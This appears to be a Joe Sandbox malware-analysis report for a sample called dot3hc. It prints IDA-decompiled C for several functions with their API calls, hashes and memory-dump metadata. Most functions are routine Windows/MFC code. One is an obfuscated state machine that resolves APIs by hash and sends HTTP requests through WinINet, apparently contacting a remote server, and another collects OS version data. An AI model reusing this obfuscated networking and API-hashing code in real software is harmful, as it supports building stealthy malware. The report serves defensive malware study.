						E00410BD8(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E004108F1(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E004108E3(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E00406177(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 004061A6
GetSystemMetrics.USER32 ref: 00406257
GlobalLock.KERNEL32 ref: 004062C0
CreateDialogIndirectParamA.USER32(?,?,?,00405BFB,00000000), ref: 004062EF

Strings

MS Shell Dlg, xrefs: 00406261

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
Instruction ID: 0bc490b1034fbbaea528403df064128feb745a9c2e9583e38ab2a070d1ec2b36
Opcode Fuzzy Hash: 3e4b4bade944808363b2727e551b547ef92d40d9d0212ec3b94de52b8e46ff9f
Instruction Fuzzy Hash: B651BE309002059BCF15EFA4C8859EEBBB4AF44314F15427EF812B72D1DB789A95CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004025F0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004025F0(intOrPtr __ecx, CHAR* _a4) {
				void* _v8;
				int _v12;
				long _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				long _t28;
				int _t31;
				char* _t38;
				char* _t41;
				char* _t44;

				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t41 =  *0x442000; // 0x4346d4
				_v16 = RegCreateKeyExA(0x80000002, _t41, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
				if(_v16 == 0) {
					_v24 = 0x800;
					E0041EB60(_a4, "exe, com, bat");
					_t38 =  *0x442010; // 0x43465c
					_t28 = RegQueryValueExA(_v8, _t38, 0,  &_v20, _a4,  &_v24); // executed
					_v16 = _t28;
					if(_v16 != 0) {
						_t31 = lstrlenA(_a4);
						_t44 =  *0x442010; // 0x43465c
						_v16 = RegSetValueExA(_v8, _t44, 0, 1, _a4, _t31 + 1);
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x004025f6
0x004025f9
0x00402600
0x0040261c
0x0040262e
0x00402635
0x00402637
0x00402647
0x0040265d
0x00402668
0x0040266e
0x00402675
0x0040267b
0x0040268d
0x0040269e
0x0040269e
0x004026a5
0x004026a5
0x004026b1

APIs

RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,00401638), ref: 00402628
_strcat.LIBCMT ref: 00402647
RegQueryValueExA.KERNELBASE(00000000,0043465C,00000000,?,00401638,00000800), ref: 00402668
lstrlenA.KERNEL32(00401638), ref: 0040267B
RegSetValueExA.ADVAPI32(00000000,0043465C,00000000,00000001,00401638,-00000001), ref: 00402698
RegCloseKey.ADVAPI32(00000000), ref: 004026A5

Strings

\FC, xrefs: 0040265D, 0040268D
exe, com, bat, xrefs: 0040263E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Value$CloseCreateQuery_strcatlstrlen
String ID: \FC$exe, com, bat
API String ID: 1958970598-4041655066
Opcode ID: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
Instruction ID: 0991be1bcda026a765b55682184bd2232a476c29beda41f33cbd04d81c06e64f
Opcode Fuzzy Hash: 1831c4f7d6f73dd4213caa599944f0336715ca713a20f07bf892c109c3f6860d
Instruction Fuzzy Hash: F4212CB9E00208FBDB14CFD4DD49FEEB7B8AB48701F108459FA15A7280D6796A04CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF65, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040EF65(void* __ecx) {
				int _t5;
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t19 + 8)) = _t5;
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x446578 = GetSystemMetrics(2) + 1;
				 *0x44657c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x0040ef70
0x0040ef72
0x0040ef76
0x0040ef7d
0x0040ef85
0x0040ef8f
0x0040efa0
0x0040efaa
0x0040efb2
0x0040efbe

APIs

KiUserCallbackDispatcher.NTDLL ref: 0040EF72
GetSystemMetrics.USER32 ref: 0040EF79
GetSystemMetrics.USER32 ref: 0040EF80
GetSystemMetrics.USER32 ref: 0040EF8A
GetDC.USER32(00000000), ref: 0040EF94
GetDeviceCaps.GDI32(00000000,00000058), ref: 0040EFA5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040EFAD
ReleaseDC.USER32 ref: 0040EFB5

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
Instruction ID: 97755fa7e18ea7b352d67f311e11813537151e1edd7cb95964a28bf73efd48b3
Opcode Fuzzy Hash: 994e65a5f7cf09011eb91012667e9cd424a14e7951b27da859b39b4ce86ef113
Instruction Fuzzy Hash: 59F09070A40700AEE3206F72AC49F677BB4EBC6B62F01443AE6518B2D0C7B5A8018F54

Uniqueness

Uniqueness Score: -1.00%

Function 0041ACA9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0041ACA9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				signed int _t11;
				void* _t14;
				intOrPtr _t17;
				void* _t18;
				struct HINSTANCE__* _t19;
				void* _t31;
				intOrPtr _t35;
				void* _t36;
				void* _t38;

				_t38 = __eflags;
				_t32 = __edi;
				_t31 = __edx;
				_t25 = __ebx;
				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0040DB94(__ebx, __edi, SetErrorMode, _t38);
				_t35 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t35;
				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
				E0040D3F7(_t14);
				_t17 =  *((intOrPtr*)(E0040DB94(__ebx, __edi, _t35, _t38) + 4));
				_t39 = _t17;
				if(_t17 != 0) {
					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
					E0041AB2A(_t17, _t31, _t39);
				}
				_t18 = E0040DB94(_t25, _t32, _t35, _t39);
				_t40 =  *((char*)(_t18 + 0x14));
				_pop(_t36);
				if( *((char*)(_t18 + 0x14)) == 0) {
					E004051C9(_t36, _t40);
				}
				_t19 = GetModuleHandleA("user32.dll");
				if(_t19 != 0) {
					 *0x4462a4 = GetProcAddress(_t19, "NotifyWinEvent");
				}
				return 1;
			}

APIs

SetErrorMode.KERNELBASE(00000000), ref: 0041ACB2
SetErrorMode.KERNELBASE(00000000), ref: 0041ACBA

Part of subcall function 0040D3F7: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040D438
Part of subcall function 0040D3F7: SetLastError.KERNEL32(0000006F), ref: 0040D452

GetModuleHandleA.KERNEL32(user32.dll), ref: 0041AD0C
GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0041AD1C

Part of subcall function 0041AB2A: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041AB6D
Part of subcall function 0041AB2A: PathFindExtensionA.KERNELBASE(?), ref: 0041AB87
Part of subcall function 0041AB2A: __strdup.LIBCMT ref: 0041ABC9

Strings

user32.dll, xrefs: 0041AD07
NotifyWinEvent, xrefs: 0041AD16

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ErrorModule$FileModeName$AddressExtensionFindHandleLastPathProc__strdup
String ID: NotifyWinEvent$user32.dll
API String ID: 2454351968-597752486
Opcode ID: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
Instruction ID: f2694494a373e7eb832031faae720e4f62f99ff10030d8dbc4a867b38e11be65
Opcode Fuzzy Hash: 616ad4c1b5ded26846f479a85218188d3b388f4c8ca7b456c2135a77635ce7eb
Instruction Fuzzy Hash: 4B01D470A007504FC710EF75D405A5A3BA4AF48700F06846FF444A7392EB38E844CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0230216D, Relevance: 9.2, APIs: 6, Instructions: 227
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0230216D(WCHAR* __ecx, short __edx, WCHAR* _a4, WCHAR* _a8, void** _a12, intOrPtr _a16) {
				WCHAR* _v4;
				short _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				void* _v36;
				WCHAR* _v44;
				WCHAR* _v48;
				void* _v52;
				intOrPtr _v60;
				void* _t36;
				void* _t39;
				intOrPtr* _t50;
				void* _t51;
				void* _t62;
				void* _t66;
				long _t70;
				WCHAR* _t72;
				void* _t83;
				long _t99;
				WCHAR* _t103;
				void* _t106;
				void** _t116;
				signed int _t119;
				void* _t126;
				void* _t127;
				void* _t130;

				_t70 = 0;
				_v8 = __edx;
				_v12 = _v12 & 0;
				_t103 = 0;
				_v4 = __ecx;
				_t119 = 0x1dfa9e13;
				_t127 = _v4;
				_t72 = 0;
				_t116 = _a12;
				_v24 = 0;
				_v28 = 0;
				while(1) {
					L1:
					while(1) {
						_t130 = _t119 - 0x1d07cf5f;
						if(_t130 > 0) {
							goto L23;
						}
						L3:
						if(_t130 == 0) {
							if(_t116 != 0) {
								_t72 = E02302674(0x2309140);
								_v28 = _t72;
							}
							E02302F84(0x65f478f7, 0xb9a26286, 0xb9);
							_t39 = HttpOpenRequestW(_v20, _t72, _a4, 0, 0, 0, 0x844cc300, 0); // executed
							_t127 = _t39;
							E02302FDF(_v60);
							_t119 =  !=  ? 0x33bc9282 : 0x1a970afc;
							goto L10;
						} else {
							if(_t119 == 0xfbdb1b7) {
								E02302F84(0x65f478f7, 0x305025f2, 0x1ce);
								_t36 = InternetConnectW(_v16, _v4, _v8, 0, 0, 3, 0, 0); // executed
								_v52 = _t36;
								_t119 =  !=  ? 0x1d07cf5f : 0x2a4cc55c;
								goto L11;
							} else {
								if(_t119 == 0x1181d787) {
									_t106 = 0x13;
									E0230212D(_t106);
									_t119 =  ==  ? 0x28dc56b0 : 0x1ace62c9;
									goto L10;
								} else {
									if(_t119 == 0x174c96ba) {
										_v12 = 0x200;
										_t126 = E02303037(0x200);
										if(_t126 != 0) {
											_t50 = E02302F84(0x1e98bdc2, 0xa9ff5dfa, 0xe6);
											_t83 = 0; // executed
											_t51 =  *_t50(_t126,  &_v12); // executed
											if(_t51 == 0) {
												_push(_t83);
												_push(_t83);
												_v36 = E02303DA2(_t126);
											}
											E02302FDF(_t126);
										}
										_t119 = 0x2e7438dc;
										goto L10;
									} else {
										if(_t119 == 0x1a970afc) {
											_push(_t36);
											 *((intOrPtr*)(E02302F84(0x65f478f7, 0x11e66bc3, 0x36)))();
											_t119 = 0x2a4cc55c;
											goto L10;
										} else {
											if(_t119 != 0x1ace62c9) {
												L38:
												if(_t119 != 0x37041747) {
													goto L1;
												}
											} else {
												E02302F84(0x65f478f7, 0x11e66bc3, 0x36);
												InternetCloseHandle(_t127); // executed
												_t119 = 0x1a970afc;
												L10:
												_t36 = _v20;
												L11:
												_t72 = _v28;
												_t103 = _v24;
												_t130 = _t119 - 0x1d07cf5f;
												if(_t130 > 0) {
													goto L23;
												}
											}
										}
									}
								}
							}
						}
						L41:
						return _t70;
						L23:
						if(_t119 == 0x1dfa9e13) {
							_t119 = 0x174c96ba;
							goto L38;
						} else {
							if(_t119 == 0x28dc56b0) {
								E0230205A(_a16);
								_t119 = 0x1ace62c9;
								_t70 =  !=  ? 1 : _t70;
								goto L10;
							} else {
								if(_t119 == 0x2a4cc55c) {
									_push(_v16);
									 *((intOrPtr*)(E02302F84(0x65f478f7, 0x11e66bc3, 0x36)))();
								} else {
									if(_t119 == 0x2e7438dc) {
										E02302F84(0x65f478f7, 0xbf8bd310, 0x3f);
										_t62 = InternetOpenW(_t103, 0, 0, 0, 0); // executed
										_v36 = _t62;
										_t119 =  !=  ? 0xfbdb1b7 : 0x37041747;
										E02302FDF(_v44);
										_t72 = _v48;
										_t103 = _v44;
										goto L38;
									} else {
										if(_t119 != 0x33bc9282) {
											goto L38;
										} else {
											if(_t116 == 0) {
												_t99 = 0;
											} else {
												_t99 = _t116[1];
											}
											if(_t116 == 0) {
												_t66 = 0;
											} else {
												_t66 =  *_t116;
											}
											E02302F84(0x65f478f7, 0x60bb4c24, 0x3d);
											HttpSendRequestW(_t127, _a8, 0xffffffff, _t66, _t99); // executed
											asm("sbb esi, esi");
											_t119 = (_t119 & 0xf6b374be) + 0x1ace62c9;
											goto L10;
										}
									}
								}
							}
						}
						goto L41;
					}
				}
			}

0x02302172
0x02302174
0x02302178
0x0230217c
0x0230217f
0x02302183
0x02302188
0x0230218c
0x0230218f
0x02302193
0x02302197
0x0230219b
0x0230219b
0x0230219f
0x0230219f
0x023021a5
0x00000000
0x00000000
0x023021ab
0x023021ab
0x023022e5
0x023022f1
0x023022f3
0x023022f3
0x0230231a
0x02302320
0x02302326
0x02302328
0x02302339
0x00000000
0x023021b1
0x023021b7
0x023022c3
0x023022c9
0x023022cd
0x023022db
0x00000000
0x023021bd
0x023021c3
0x02302281
0x02302284
0x02302298
0x00000000
0x023021c9
0x023021cf
0x02302230
0x02302239
0x0230223d
0x02302256
0x0230225b
0x0230225c
0x02302260
0x02302262
0x02302263
0x0230226d
0x0230226d
0x02302273
0x02302273
0x02302278
0x00000000
0x023021d1
0x023021d7
0x0230220d
0x02302220
0x02302222
0x00000000
0x023021d9
0x023021df
0x02302425
0x0230242b
0x00000000
0x0230242d
0x023021e5
0x023021f2
0x023021f8
0x023021fa
0x023021ff
0x023021ff
0x02302203
0x02302203
0x02302207
0x0230219f
0x023021a5
0x00000000
0x00000000
0x023021a5
0x023021df
0x023021d7
0x023021cf
0x023021c3
0x023021b7
0x0230244a
0x02302453
0x02302341
0x02302347
0x02302420
0x00000000
0x0230234d
0x02302354
0x02302409
0x02302410
0x02302418
0x00000000
0x0230235a
0x02302360
0x02302432
0x02302448
0x02302366
0x0230236c
0x023023d5
0x023023db
0x023023e3
0x023023f1
0x023023f4
0x023023f9
0x023023fd
0x00000000
0x0230236e
0x02302375
0x00000000
0x0230237b
0x0230237d
0x02302384
0x0230237f
0x0230237f
0x0230237f
0x02302388
0x0230238e
0x0230238a
0x0230238a
0x0230238a
0x023023a5
0x023023ab
0x023023af
0x023023b7
0x00000000
0x023023b7
0x02302375
0x0230236c
0x02302360
0x02302354
0x00000000
0x02302347
0x0230219f

APIs

InternetCloseHandle.WININET(?,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 023021F8
ObtainUserAgentString.URLMON(00000000,00000000,?,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 0230225C
InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 023022C9
HttpOpenRequestW.WININET(?,00000000,?,00000000,00000000,00000000,844CC300,00000000,00000000,?,?,?,?,?,?,?), ref: 02302320
HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 023023AB
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,2895FB0B,?,?), ref: 023023DB

Part of subcall function 02302FDF: RtlFreeHeap.NTDLL(00000000,00000000,005B4C50), ref: 02303012

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: Internet$HttpOpenRequest$AgentCloseConnectFreeHandleHeapObtainSendStringUser
String ID:
API String ID: 3667348119-0
Opcode ID: f701a5df34b4201b4a27d6f2c11009cbcf353d500af73f89048eb1773a987723
Instruction ID: 4e6e707723317106020883b55217a0f742e85fd52055cd450a57af0260b80555
Opcode Fuzzy Hash: f701a5df34b4201b4a27d6f2c11009cbcf353d500af73f89048eb1773a987723
Instruction Fuzzy Hash: BE614E35B083126BD668EA6848ECA3FB5DE9BC8350F90056DFC55DB2C5DB20DD058BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0040C572, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040C572(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t173;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E0040DB94(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E0041F330(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E0040DB94(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x4465b8; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E0040C38E(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E0040C38E(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E0040C531(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E0040C531(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t173 = E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0); // executed
					_t201 = _t201 | _t173;
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E0040A1C2(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E0040A1C2(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

APIs

_memset.LIBCMT ref: 0040C5A0

Strings

AfxFrameOrView80s, xrefs: 0040C666
AfxMDIFrame80s, xrefs: 0040C641
@, xrefs: 0040C745
@, xrefs: 0040C6AC

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
Instruction ID: e6b970e612583588a719d793e0dd92c83582657bdf5cb49032b9efa87aaaa162
Opcode Fuzzy Hash: af90f3d793df6aa5d0f43c2ff2de7d4dbca73bf6dbea27fcc50b6289e62f7852
Instruction Fuzzy Hash: C3810171D00219AADB50DFA4C4C5BDEBBF9AF08344F24817AF914F62C1E7789A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 02303B4E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E02303B4E() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				void* _t8;
				void* _t29;

				_t8 = 0x15d9ec19;
				_t29 = 0;
				do {
					while(_t8 != 0x15d9ec19) {
						if(_t8 == 0x16aa3898) {
							_t29 = _t29 + _v280 * 0x3e8;
							_t8 = 0x178645ae;
							continue;
						} else {
							if(_t8 == 0x178645ae) {
								_t29 = _t29 + _v276 * 0x64;
								_t8 = 0x38ea8c1c;
								continue;
							} else {
								if(_t8 == 0x1c5820e2) {
									_v284 = 0x11c;
									_push( &_v284);
									 *((intOrPtr*)(E02302F84(0xa83808e5, 0x11702f10, 0x1f8)))();
									_t8 = 0x1f928384;
									continue;
								} else {
									if(_t8 == 0x1f928384) {
										_push( &_v320);
										 *((intOrPtr*)(E02302F84(0xf568ce83, 0xdcd4d836, 0x86)))(); // executed
										_t8 = 0x20505ee2;
										continue;
									} else {
										if(_t8 == 0x20505ee2) {
											_t29 = _t29 + (_v2 & 0x000000ff) * 0x186a0;
											_t8 = 0x16aa3898;
											continue;
										} else {
											if(_t8 != 0x38ea8c1c) {
												goto L16;
